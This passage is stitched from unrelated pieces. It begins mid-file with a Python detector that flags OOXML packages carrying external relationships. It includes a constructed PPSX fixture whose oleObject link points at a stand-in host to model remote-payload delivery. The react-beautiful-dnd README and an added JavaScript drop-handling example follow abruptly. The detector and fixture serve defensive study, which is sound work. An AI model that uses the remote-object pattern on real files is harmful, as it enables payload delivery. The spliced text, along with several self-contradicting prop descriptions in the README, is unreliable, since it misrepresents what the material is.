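    """Return [(part, relationship kind, target)] for every relationship leaving the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "").lower() == "external":
                    kind = rel.get("Type", "").rsplit("/", 1)[-1]
                    findings.append((name, kind, rel.get("Target", "")))
    return findings


def is_suspicious(ooxml_bytes):
    """Policy: any external relationship that resolves to a fetchable location is enough to hold for review."""
    remote = ("http://", "https://", "file://", "\\\\")
    return any(target.lower().startswith(remote) for _, _, target in external_relationships(ooxml_bytes))


def _rels(entries):
    """Build a .rels part from (kind, target, extra-attributes) tuples (constructed)."""
    body = "".join(
        '<Relationship Id="rId%d" Type="%s%s" Target="%s"%s/>' % (i, OFFICE_REL, kind, target, extra)
        for i, (kind, target, extra) in enumerate(entries, 1)
    )
    return '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="%s">%s</Relationships>' % (REL_NS, body)


def _package(slide_rels):
    """Minimal PPSX-shaped ZIP: just enough parts to carry one slide's .rels (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("_rels/.rels", _rels([("officeDocument", "ppt/presentation.xml", "")]))
        z.writestr("ppt/slides/slide1.xml", "<p:sld/>")
        z.writestr("ppt/slides/_rels/slide1.xml.rels", _rels(slide_rels))
    return buf.getvalue()


CLEAN_PPSX = _package([("slideLayout", "../slideLayouts/slideLayout1.xml", "")])
REMOTE_PPSX = _package([
    ("slideLayout", "../slideLayouts/slideLayout1.xml", ""),
    ("oleObject", "http://remote.example/logo.doc", ' TargetMode="External"'),
])

if __name__ == "__main__":
    print("clean:", external_relationships(CLEAN_PPSX), is_suspicious(CLEAN_PPSX))
    print("remote:", external_relationships(REMOTE_PPSX), is_suspicious(REMOTE_PPSX))
```

Legitimate documents do carry external relationships (hyperlinks are the usual case), which is why the check reports the relationship kind alongside the target: a `hyperlink` to a web page is ordinary, while an `oleObject` or similar embedded-content relationship that points at a remote `.doc` is the shape of the delivery described above and deserves a hold.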
  25. Beautiful, accessible drag and drop for lists with React.js

Examples

See how beautiful it is for yourself - have a play with the examples!

Core characteristics:
- beautiful, natural movement of items
- clean and powerful api which is simple to get started with
- unopinionated styling
- no creation of additional wrapper dom nodes - flexbox and focus management friendly!
- plays well with existing interactive nodes such as anchors
- state driven dragging - which allows for dragging from many input types, including programmatic dragging. Currently only mouse and keyboard dragging are supported

Why not react-dnd?

There are a lot of libraries out there that allow for drag and drop interactions within React. Most notable of these is the amazing react-dnd. It does an incredible job at providing a great set of drag and drop primitives which work especially well with the wildly inconsistent html5 drag and drop feature. react-beautiful-dnd is a higher level abstraction specifically built for vertical and horizontal lists. Within that subset of functionality react-beautiful-dnd offers a powerful, natural and beautiful drag and drop experience. However, it does not provide the breadth of functionality offered by react-dnd. So this library might not be for you depending on what your use case is.

Still young!

This library is still fairly new and so there is a relatively small feature set. Be patient! Things will be moving rather quickly!
Currently supported feature set
- dragging an item within a single vertical list
- multiple independent lists on the one page
- mouse and keyboard dragging
- flexible height items (the draggable items can have different heights)
- custom drag handle (you can drag a whole item by just a part of it)
- the vertical list can be a scroll container (without a scrollable parent) or be the child of a scroll container (that also does not have a scrollable parent)

Short term backlog
- Dragging within a horizontal list
- Moving items between vertical lists (until this lands conditional dropping will not be available)

Medium term backlog
- Moving items between horizontal lists
- Moving a Draggable from a vertical list to a horizontal list
- Dragging multiple items at once

Long term backlog
- Touch support
- Automatically disabling animations when the frame rate drops below a threshold.
- A mechanism to programmatically perform dragging without user input
- And lots more!

Basic usage example

This is a simple reorderable list. You can play with it on webpackbin

```js
import React, { Component } from 'react';
import ReactDOM from 'react-dom';
import { DragDropContext, Droppable, Draggable } from 'react-beautiful-dnd';

// fake data generator
const getItems = (count) => Array.from({ length: count }, (v, k) => k).map(k => ({
  id: `item-${k}`,
  content: `item ${k}`,
}));

// a little function to help us with reordering the result
const reorder = (list, startIndex, endIndex) => {
  const result = Array.from(list);
  const [removed] = result.splice(startIndex, 1);
  result.splice(endIndex, 0, removed);
  return result;
};

// using some little inline style helpers to make the app look okay
const grid = 8;

const getItemStyle = (draggableStyle, isDragging) => ({
  // some basic styles to make the items look a bit nicer
  userSelect: 'none',
  padding: grid * 2,
  marginBottom: grid,
  // change background colour if dragging
  background: isDragging ? 'lightgreen' : 'grey',
  // styles we need to apply on draggables
  ...draggableStyle,
});

const getListStyle = (isDraggingOver) => ({
  background: isDraggingOver ? 'lightblue' : 'lightgrey',
  padding: grid,
  width: 250,
});

class App extends Component {
  constructor(props) {
    super(props);
    this.state = { items: getItems(10) };
    this.onDragEnd = this.onDragEnd.bind(this);
  }

  onDragEnd(result) {
    // dropped outside the list
    if (!result.destination) {
      return;
    }
    const items = reorder(
      this.state.items,
      result.source.index,
      result.destination.index
    );
    this.setState({ items });
  }

  // Normally you would want to split things out into separate components.
  // But in this example everything is just done in one place for simplicity
  render() {
    return (
      <DragDropContext onDragEnd={this.onDragEnd}>
        <Droppable droppableId="droppable">
          {(provided, snapshot) => (
            <div ref={provided.innerRef} style={getListStyle(snapshot.isDraggingOver)}>
              {this.state.items.map(item => (
                <Draggable key={item.id} draggableId={item.id}>
                  {(provided, snapshot) => (
                    <div>
                      <div
                        ref={provided.innerRef}
                        style={getItemStyle(provided.draggableStyle, snapshot.isDragging)}
                        {...provided.dragHandleProps}
                      >
                        {item.content}
                      </div>
                      {provided.placeholder}
                    </div>
                  )}
                </Draggable>
              ))}
            </div>
          )}
        </Droppable>
      </DragDropContext>
    );
  }
}

// Put the thing into the DOM!
ReactDOM.render(<App />, document.getElementById('app'));
```

Core design principle

Drag and drop with react-beautiful-dnd is supposed to feel physical and natural, similar to that of moving physical objects around. Things should never 'snap' anywhere. Rather, everything should move naturally as much as possible.

Application 1: knowing when to move

Draggables will move into their new position based on their center of gravity. Regardless of where a user grabs an item from, the movement of other things is based on its center position. This is similar to a set of scales.
Here are some rules that are followed to allow for a natural drag experience even with items of flexible height:

- A Droppable is dragged over when the center position of a dragging item goes over one of the boundaries of the Droppable
- A resting Draggable will move out of the way of a dragging Draggable when the center position of the dragging Draggable goes over the edge of the resting Draggable. Put another way: once the center position of a Draggable (A) goes over the edge of another Draggable (B), B moves out of the way.

### Application 2: no drop shadows

Drop shadows are useful in an environment where items and their destinations snap around. However, with react-beautiful-dnd it should be obvious where things will be dropping based on the movement of items. This might be changed in the future - but the experiment is to see how far we can get without any of these affordances.

## Sloppy clicks and click blocking

A drag will not start until a user has dragged their mouse past a small threshold. If this threshold is not exceeded then the library will not impact the mouse click and will release the event to the browser.

When a user presses the mouse down on an element, we cannot determine if the user was clicking or dragging. If the sloppy click threshold was not exceeded then the event will be treated as if it were a click and the click event will bubble up unmodified. If the user has started dragging by moving the mouse beyond the sloppy click threshold then the click event will be prevented. This behavior allows you to wrap an element that has click behavior such as an anchor and have it work just like a standard anchor while also allowing it to be dragged (it is a schrodinger's cat joke).

## Focus management

react-beautiful-dnd does not create any wrapper elements. This means that it will not impact the tab flow of a document. For example, if you are wrapping an anchor tag then the user will tab to the anchor directly and not an element surrounding the anchor.
Whatever element you wrap will be given a tab-index to ensure that users can tab to the element to perform keyboard dragging.

## Keyboard dragging

Traditionally drag and drop interactions have been exclusively a mouse or touch interaction. This library supports drag and drop interactions using only a keyboard. This enables power users to drive more of our interfaces with a keyboard. It also opens drag and drop interactions to those who previously would be unable to use them due to an impediment.

### Shortcuts

Currently the keyboard handling is hard coded. This could be changed in the future to become customisable. Here is the existing keyboard mapping:

- tab ↹ - standard browser tabbing will navigate through the Droppables. The library does not do anything fancy with tab while users are selecting. Once a drag has started, tab is blocked for the duration of the drag.
- spacebar - lift a focused Draggable. Also, drop a dragging Draggable where the drag was started with a spacebar.
- Up arrow ↑ - move a Draggable that is dragging up on a vertical list
- Down arrow ↓ - move a Draggable that is dragging down on a vertical list
- Escape esc - cancel an existing drag - regardless of whether the user is dragging with the keyboard or mouse.

### Limitations of keyboard dragging

There is currently a limitation of keyboard dragging: the drag will cancel if the user scrolls the window. This could be worked around but for now it is the simplest initial approach.

## Installation

```sh
# yarn
yarn add react-beautiful-dnd

# npm
npm install react-beautiful-dnd --save
```

## API

So how do you use the library?

### DragDropContext

In order to use drag and drop, you need to have the part of your react tree that you want to be able to use drag and drop in wrapped in a DragDropContext. It is advised to just wrap your entire application in a DragDropContext. Having nested DragDropContexts is not supported. You will be able to achieve your desired conditional dragging and dropping using the props of Droppable and Draggable.
You can think of DragDropContext as having a similar purpose to the react-redux Provider component.

#### Prop type information

```js
type Hooks = {|
  onDragStart?: (id: DraggableId, location: DraggableLocation) => void,
  onDragEnd: (result: DropResult) => void,
|}

type Props = Hooks & {|
  children?: ReactElement,
|}
```

#### Basic usage

```js
import { DragDropContext } from 'react-beautiful-dnd';

class App extends React.Component {
  onDragStart = () => {...}
  onDragEnd = () => {...}

  render() {
    return (
      <DragDropContext
        onDragStart={this.onDragStart}
        onDragEnd={this.onDragEnd}
      >
        <div>Hello world</div>
      </DragDropContext>
    )
  }
}
```

#### Hooks

These are top level application events that you can use to perform your own state updates.

##### onDragStart (optional)

This function will get notified when a drag starts. You are provided with the following details:

- id: the id of the Draggable that is now dragging
- location: the location (droppableId and index) of where the dragging item has started within a Droppable.

This function is optional and therefore does not need to be provided. It is highly recommended that you use this function to block updates to all Draggable and Droppable components during a drag. (See Best hooks practices)

Type information

```js
onDragStart?: (id: DraggableId, location: DraggableLocation) => void

// supporting types
type Id = string;
type DroppableId = Id;
type DraggableId = Id;
type DraggableLocation = {|
  droppableId: DroppableId,
  // the position of the draggable within a droppable
  index: number
|};
```

##### onDragEnd (required)

This function is extremely important and has a critical role to play in the application lifecycle. This function must result in the synchronous reordering of a list of Draggables.

It is provided with all the information about a drag:

- result: DragResult
- result.draggableId: the id of the Draggable that was dragging.
- result.source: the location that the Draggable started in.
- result.destination: the location that the Draggable finished in.
The destination will be null if the user dropped into no position (such as outside any list) or if they dropped the Draggable back into the same position that it started in.

Synchronous reordering

Because this library does not control your state, it is up to you to synchronously reorder your lists based on the result. Here is what you need to do:

- if the destination is null: all done!
- if source.droppableId equals destination.droppableId you need to remove the item from your list and insert it at the correct position.
- if source.droppableId does not equal destination.droppableId you need to remove the Draggable from the source.droppableId list and add it into the correct position of the destination.droppableId list.

Type information

```js
onDragEnd: (result: DropResult) => void

// supporting types
type DropResult = {|
  draggableId: DraggableId,
  source: DraggableLocation,
  // may not have any destination (drag to nowhere)
  destination: ?DraggableLocation
|}

type Id = string;
type DroppableId = Id;
type DraggableId = Id;
type DraggableLocation = {|
  droppableId: DroppableId,
  // the position of the draggable within a droppable
  index: number
|};
```

#### Best practices for hooks

Block updates during a drag

It is highly recommended that while a user is dragging you block any state updates that might impact the amount of Draggables and Droppables, or their dimensions. Please listen to onDragStart and block updates to the Draggables and Droppables until you receive an onDragEnd.

When the user starts dragging we take a snapshot of all of the dimensions of the applicable Draggable and Droppable nodes. If these change during a drag we will not know about it. Here are a few poor user experiences that can occur if you change things during a drag:

- If you increase the amount of nodes the library will not know about them and they will not be moved when the user would expect them to be.
- If you decrease the amount of nodes then there might be gaps and unexpected movements in your lists.
- If you change the dimensions of any node, it can cause the changed node as well as others to move at incorrect times.
- If you remove the node that the user is dragging the drag will instantly end.
- If you change the dimension of the dragging node then other things will not move out of the way at the correct time.

onDragStart and onDragEnd pairing

We try very hard to ensure that each onDragStart event is paired with a single onDragEnd event. However, there may be a rogue situation where this is not the case. If that occurs - it is a bug. Currently there is no mechanism to tell the library to cancel a current drag externally.

Style

During a drag it is recommended that you add two styles to the body: user-select: none; and cursor: grab; (or whatever cursor you want to use while dragging)

- user-select: none; prevents the user drag from selecting text on the page as they drag.
- cursor: [your desired cursor]; is needed because we apply pointer-events: none; to the dragging item. This prevents you from setting your own cursor style on the Draggable directly based on snapshot.isDragging (see Draggable).

Dynamic hooks

Your hook functions will only be captured once at start up. Please do not change the function after that. If there is a valid use case for this then dynamic hooks could be supported. However, at this time it is not.

### Droppable

Droppable components can be dropped on by a Draggable. They also contain Draggables. A Draggable must be contained within a Droppable.

```js
import { Droppable } from 'react-beautiful-dnd';

<Droppable
  droppableId="droppable-1"
  type="PERSON"
>
  {(provided, snapshot) => (
    <div
      ref={provided.innerRef}
      style={{ backgroundColor: snapshot.isDraggingOver ? 'blue' : 'grey' }}
    >
      I am a droppable!
    </div>
  )}
</Droppable>
```

#### Props

- droppableId: A required DroppableId (string) that uniquely identifies the droppable for the application. Please do not change this prop - especially during a drag.
- type: An optional TypeId (string) that can be used to simply accept a class of Draggable. For example, if you use the type PERSON then it will only allow Draggables of type PERSON to be dropped on itself. Draggables of type TASK would not be able to be dropped on a Droppable with type PERSON. If no type is provided, it will be set to 'DEFAULT'. Currently the type of the Draggables within a Droppable must be the same. This restriction might be loosened in the future if there is a valid use case.
- isDropDisabled: An optional flag to control whether or not dropping is currently allowed on the Droppable. You can use this to implement your own conditional dropping logic. It will default to false.

#### Children function

The React children of a Droppable must be a function that returns a ReactElement.

```js
<Droppable droppableId="droppable-1">
  {(provided, snapshot) => (
    // ...
  )}
</Droppable>
```

The function is provided with two arguments:

1. provided: (Provided)

```js
type Provided = {|
  innerRef: (HTMLElement) => mixed,
|}
```

In order for the droppable to function correctly, you must bind the provided.innerRef to the highest possible DOM node in the ReactElement. We do this in order to avoid needing to use ReactDOM to look up your DOM node.

```js
<Droppable droppableId="droppable-1">
  {(provided, snapshot) => (
    <div ref={provided.innerRef}>
      Good to go
    </div>
  )}
</Droppable>
```

2. snapshot: (StateSnapshot)

```js
type StateSnapshot = {|
  isDraggingOver: boolean,
|}
```

The children function is also provided with a small amount of state relating to the current drag state. This can be optionally used to enhance your component. A common use case is changing the appearance of a Droppable while it is being dragged over.

```js
<Droppable droppableId="droppable-1">
  {(provided, snapshot) => (
    <div
      ref={provided.innerRef}
      style={{ backgroundColor: snapshot.isDraggingOver ? 'blue' : 'grey' }}
    >
      I am a droppable!
    </div>
  )}
</Droppable>
```

#### Conditionally dropping

Keep in mind that this is not supported at this time.
In this current initial version we only support reordering within a single list.

- Droppables can only be dropped on by Draggables who share the same type. This is a simple way of allowing conditional dropping. If you do not provide a type for the Droppable then it will only accept Draggables which also have the default type. Draggables and Droppables both will have their types set to 'DEFAULT' when none is provided. There is currently no way to set multiple types, or a type wildcard that will accept Draggables of multiple types. This could be added if there is a valid use case.
- Using the isDropDisabled prop you can conditionally allow dropping. This allows you to do arbitrarily complex conditional transitions. This will only be considered if the type of the Droppable matches the type of the currently dragging Draggable.
- You can disable dropping on a Droppable altogether by always setting isDropDisabled to false. You can do this to create a list that is never able to be dropped on, but contains Draggables.
- Technically you do not need to use type and do all of your conditional drop logic with the isDropDisabled function. The type parameter is a convenient shortcut for a common use case.

#### Scroll containers

This library supports dragging within scroll containers (DOM elements that have overflow: auto; or overflow: scroll;). The only supported use cases are:

1. The Droppable can itself be a scroll container with no scrollable parents
2. The Droppable has one scrollable parent

Auto scrolling is not provided

Currently auto scrolling of scroll containers is not part of this library. Auto scrolling is where the container automatically scrolls to make room for the dragging item as you drag near the edge of a scroll container. You are welcome to build your own auto scrolling list, or if you would really like it as part of this library we could provide an auto scrolling Droppable.
Users will be able to scroll a scroll container while dragging by using their trackpad or mouse wheel.

Keyboard dragging limitation

Getting keyboard dragging to work with scroll containers is quite difficult. Currently there is a limitation: you cannot drag with a keyboard beyond the visible edge of a scroll container. This limitation could be removed if we introduced auto scrolling.

### Draggable

Draggable components can be dragged around and dropped onto Droppables. A Draggable must always be contained within a Droppable. It is possible to reorder a Draggable within its home Droppable or move to another Droppable. It is possible because a Droppable is free to control what it allows to be dropped on it.

Note: moving between Droppables is currently not supported in the initial version.

```js
import { Draggable } from 'react-beautiful-dnd';

<Draggable
  draggableId="draggable-1"
  type="PERSON"
>
  {(provided, snapshot) => (
    <div>
      <div
        ref={provided.innerRef}
        style={provided.draggableStyle}
        {...provided.dragHandleProps}
      >
        <h4>My draggable</h4>
      </div>
      {provided.placeholder}
    </div>
  )}
</Draggable>
```

Note: when the library moves to React 16 this will be cleaned up a little bit as we will be able to return the placeholder as a sibling to your child function without you needing to create a wrapping element.

#### Props

- draggableId: A required DraggableId (string) that uniquely identifies the Draggable for the application. Please do not change this prop - especially during a drag.
- type: An optional type (TypeId (string)) of the Draggable. This is used to control what Droppables the Draggable is permitted to drop on. Draggables can only drop on Droppables that share the same type. If no type is provided, it will be set to 'DEFAULT'. Currently the type of a Draggable must be the same as its container Droppable. This restriction might be loosened in the future if there is a valid use case.
- isDragDisabled: An optional flag to control whether or not dropping is currently allowed on the Droppable. You can use this to implement your own conditional dropping logic. It will default to false.

#### Children function

The React children of a Draggable must be a function that returns a ReactElement.

```js
<Draggable draggableId="draggable-1">
  {(provided, snapshot) => (
    <div>
      <div
        ref={provided.innerRef}
        style={provided.draggableStyle}
        {...provided.dragHandleProps}
      >
        Drag me!
      </div>
      {provided.placeholder}
    </div>
  )}
</Draggable>
```

The function is provided with two arguments:

1. provided: (Provided)

```js
type Provided = {|
  innerRef: (HTMLElement) => void,
  draggableStyle: ?DraggableStyle,
  dragHandleProps: ?DragHandleProvided,
  placeholder: ?ReactElement,
|}
```

Everything within the provided object must be applied for the Draggable to function correctly.

provided.innerRef (innerRef: (HTMLElement) => void): In order for the Droppable to function correctly, you must bind the innerRef function to the ReactElement that you want to be considered the Draggable node. We do this in order to avoid needing to use ReactDOM to look up your DOM node.

```js
<Draggable draggableId="draggable-1">
  {(provided, snapshot) => (
    <div ref={provided.innerRef}>
      Drag me!
    </div>
  )}
</Draggable>
```

Type information

```js
innerRef: (HTMLElement) => void
```

provided.draggableStyle (?DraggableStyle): This is an Object or null that contains a number of styles that need to be applied to the Draggable. This needs to be applied to the same node that you apply provided.innerRef to. This controls the movement of the draggable when it is dragging and not dragging. You are welcome to add your own styles to this object - but please do not remove or replace any of the properties.

Ownership

It is a contract of this library that it owns the positioning logic of the dragging element. This includes properties such as top, right, bottom, left and transform.
The library may change how it positions things and what properties it uses without performing a major version bump. It is also recommended that you do not apply your own transition property to the dragging element.

```js
<Draggable draggableId="draggable-1">
  {(provided, snapshot) => (
    <div>
      <div
        ref={provided.innerRef}
        style={provided.draggableStyle}
      >
        Drag me!
      </div>
    </div>
  )}
</Draggable>
```

Extending with your own styles

```js
<Draggable draggableId="draggable-1">
  {(provided, snapshot) => {
    const style = {
      ...provided.draggableStyle,
      backgroundColor: snapshot.isDragging ? 'blue' : 'white',
      fontSize: 18,
    };
    return (
      <div>
        <div
          ref={provided.innerRef}
          style={style}
        >
          Drag me!
        </div>
      </div>
    );
  }}
</Draggable>
```

Type information

```js
type DraggableStyle = DraggingStyle | NotDraggingStyle;

type DraggingStyle = {|
  position: 'fixed',
  boxSizing: 'border-box',
  // allow scrolling of the element behind the dragging element
  pointerEvents: 'none',
  zIndex: ZIndex,
  width: number,
  height: number,
  top: number,
  left: number,
  transform: ?string,
|}

type NotDraggingStyle = {|
  transition: ?string,
  transform: ?string,
  pointerEvents: 'none' | 'auto',
|}
```

provided.placeholder (?ReactElement): The Draggable element has position: fixed applied to it while it is dragging. The role of the placeholder is to sit in the place that the Draggable was during a drag. It is needed to stop the Droppable list from collapsing when you drag. It is advised to render it as a sibling to the Draggable node. When the library moves to React 16 the placeholder will be removed from the api.

```js
<Draggable draggableId="draggable-1">
  {(provided, snapshot) => (
    <div>
      <div
        ref={provided.innerRef}
        style={provided.draggableStyle}
      >
        Drag me!
      </div>
      {/* Always render me - I will be null if not required */}
      {provided.placeholder}
    </div>
  )}
</Draggable>
```

provided.dragHandleProps (?DragHandleProps): Every Draggable has a drag handle. This is what is used to drag the whole Draggable.
Often this will be the same node as the Draggable, but sometimes it can be a child of the Draggable. DragHandleProps need to be applied to the node that you want to be the drag handle. This is a number of props that need to be applied to the Draggable node. The simplest approach is to spread the props onto the draggable node ({...provided.dragHandleProps}). However, you are also welcome to monkey patch these props if you also need to respond to them. DragHandleProps will be null when isDragDisabled is set to true.

Type information

```js
type DragHandleProps = {|
  onMouseDown: (event: MouseEvent) => void,
  onKeyDown: (event: KeyboardEvent) => void,
  onClick: (event: MouseEvent) => void,
  tabIndex: number,
  'aria-grabbed': boolean,
  draggable: boolean,
  onDragStart: () => void,
  onDrop: () => void
|}
```

Standard example

```js
<Draggable draggableId="draggable-1">
  {(provided, snapshot) => (
    <div>
      <div
        ref={provided.innerRef}
        style={provided.draggableStyle}
        {...provided.dragHandleProps}
      >
        Drag me!
      </div>
      {provided.placeholder}
    </div>
  )}
</Draggable>
```

Custom drag handle

```js
<Draggable draggableId="draggable-1">
  {(provided, snapshot) => (
    <div>
      <div
        ref={provided.innerRef}
        style={provided.draggableStyle}
      >
        <h2>Hello there</h2>
        <div {...provided.dragHandleProps}>
          Drag handle
        </div>
      </div>
      {provided.placeholder}
    </div>
  )}
</Draggable>
```

Monkey patching

If you want to also use one of the props in DragHandleProps:

```js
const myOnClick = (event) => console.log('clicked on', event.target);

<Draggable draggableId="draggable-1">
  {(provided, snapshot) => {
    const onClick = (() => {
      // dragHandleProps might be null
      if (!provided.dragHandleProps) {
        return myOnClick;
      }

      // creating a new onClick function that calls my onClick
      // event as well as the provided one.
      return (event) => {
        provided.dragHandleProps.onClick(event);
        // You may want to check if event.defaultPrevented
        // is true and optionally fire your handler
        myOnClick(event);
      };
    })();

    return (
      <div>
        <div
          ref={provided.innerRef}
          style={provided.draggableStyle}
          {...provided.dragHandleProps}
          onClick={onClick}
        >
          Drag me!
        </div>
        {provided.placeholder}
      </div>
    );
  }}
</Draggable>
```

2. snapshot: (StateSnapshot)

```js
type StateSnapshot = {|
  isDragging: boolean,
|}
```

The children function is also provided with a small amount of state relating to the current drag state. This can be optionally used to enhance your component. A common use case is changing the appearance of a Draggable while it is being dragged.

Note: if you want to change the cursor to something like grab you will need to add the style to the body. (See DragDropContext > style above)

```js
<Draggable draggableId="draggable-1">
  {(provided, snapshot) => {
    const style = {
      ...provided.draggableStyle,
      backgroundColor: snapshot.isDragging ? 'blue' : 'grey',
    };

    return (
      <div>
        <div
          ref={provided.innerRef}
          style={style}
          {...provided.dragHandleProps}
        >
          Drag me!
        </div>
        {provided.placeholder}
      </div>
    );
  }}
</Draggable>
```

## Engineering health

### Typed

This codebase is typed with flowtype to promote greater internal consistency and more resilient code.

### Tested

This code base employs a number of different testing strategies including unit, performance and integration tests. Testing various aspects of the system helps to promote its quality and stability.

While code coverage is not a guarantee of code health, it is a good indicator. This code base currently sits at ~95% coverage.

### Performance

This codebase is designed to be extremely performant - it is part of its DNA. It builds on prior investigations into React performance that you can read about here and here. It is designed to perform the minimum number of renders required for each task.
Highlights

- using connected-components with memoization to ensure the only components that render are the ones that need to - thanks react-redux, reselect and memoize-one
- all movements are throttled with a requestAnimationFrame - thanks raf-schd
- memoization is used all over the place - thanks memoize-one
- conditionally disabling pointer-events on Draggables while dragging to prevent the browser needing to do redundant work

Minimal browser paints

Minimal React updates

## Supported browsers

This library supports the standard Atlassian supported browsers for desktop:

| Desktop | Version |
| --- | --- |
| Microsoft Internet Explorer (Windows) | Version 11 |
| Microsoft Edge | Latest stable version supported |
| Mozilla Firefox (all platforms) | Latest stable version supported |
| Google Chrome (Windows and Mac) | Latest stable version supported |
| Safari (Mac) | Latest stable version on latest OS release supported |

Currently mobile is not supported. However, there are plans to add touch support in the future.

## Author / maintainer

Alex Reardon - @alexandereardon - areardon@atlassian.com

Download: react-beautiful-dnd-master.zip

Source: https://github.com/atlassian/react-beautiful-dnd
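As an added example (not code from the react-beautiful-dnd README or the project itself), here is a framework-free model of the two hook responsibilities described above: applying a DropResult synchronously in onDragEnd (null destination, same-list reorder, cross-list move) and blocking state updates while a drag is in progress, replaying them after onDragEnd. The list shape `{ droppableId: [{ id }, ...] }`, the `DragSession` class and the `update(fn)` API are assumptions constructed for this example; it also adds a defensive check that the item at `source.index` really is `result.draggableId`, which guards against the state drift the README warns about.

```javascript
// Constructed example, not react-beautiful-dnd code. Models what an onDragEnd
// hook must do with a DropResult and the "block updates during a drag" rule.
// List shape ({ droppableId: [{ id }, ...] }) is an assumption of this example.

// Reorder within one list without mutating the input.
const reorder = (list, startIndex, endIndex) => {
  const result = Array.from(list);
  const [removed] = result.splice(startIndex, 1);
  result.splice(endIndex, 0, removed);
  return result;
};

// Move one item between two lists, returning fresh copies of both.
const move = (sourceList, destinationList, source, destination) => {
  const sourceClone = Array.from(sourceList);
  const destinationClone = Array.from(destinationList);
  const [removed] = sourceClone.splice(source.index, 1);
  destinationClone.splice(destination.index, 0, removed);
  return {
    [source.droppableId]: sourceClone,
    [destination.droppableId]: destinationClone,
  };
};

// Apply a DropResult ({ draggableId, source, destination }) to a map of lists
// keyed by droppableId. Never mutates its input; returns the same object when
// there is nothing to do so callers can skip a re-render.
const applyDropResult = (lists, result) => {
  const { draggableId, source, destination } = result;
  // Dropped outside any Droppable, or back in the starting position.
  if (!destination) {
    return lists;
  }
  const sourceList = lists[source.droppableId];
  // Defensive check: if the item at the source index is not the one the library
  // reports as dragged, our state changed during the drag. Refuse rather than
  // reorder the wrong item.
  if (!sourceList || !sourceList[source.index] || sourceList[source.index].id !== draggableId) {
    return lists;
  }
  if (source.droppableId === destination.droppableId) {
    return { ...lists, [source.droppableId]: reorder(sourceList, source.index, destination.index) };
  }
  return { ...lists, ...move(sourceList, lists[destination.droppableId], source, destination) };
};

// Owns the lists and enforces "no updates during a drag". `update` takes a
// function from the current lists to new lists.
class DragSession {
  constructor(lists) {
    this.lists = lists;
    this.dragging = false;
    this.deferred = []; // updaters queued while a drag is in progress
  }

  // Wire to DragDropContext onDragStart(id, location).
  onDragStart() {
    this.dragging = true;
  }

  // Wire to DragDropContext onDragEnd(result): reorder synchronously first,
  // then replay any updates that arrived during the drag, in order.
  onDragEnd(result) {
    this.lists = applyDropResult(this.lists, result);
    this.dragging = false;
    const queued = this.deferred;
    this.deferred = [];
    queued.forEach((fn) => this.update(fn));
    return this.lists;
  }

  // Returns true if applied now, false if queued until the drag ends.
  update(fn) {
    if (this.dragging) {
      this.deferred.push(fn);
      return false;
    }
    this.lists = fn(this.lists);
    return true;
  }
}
```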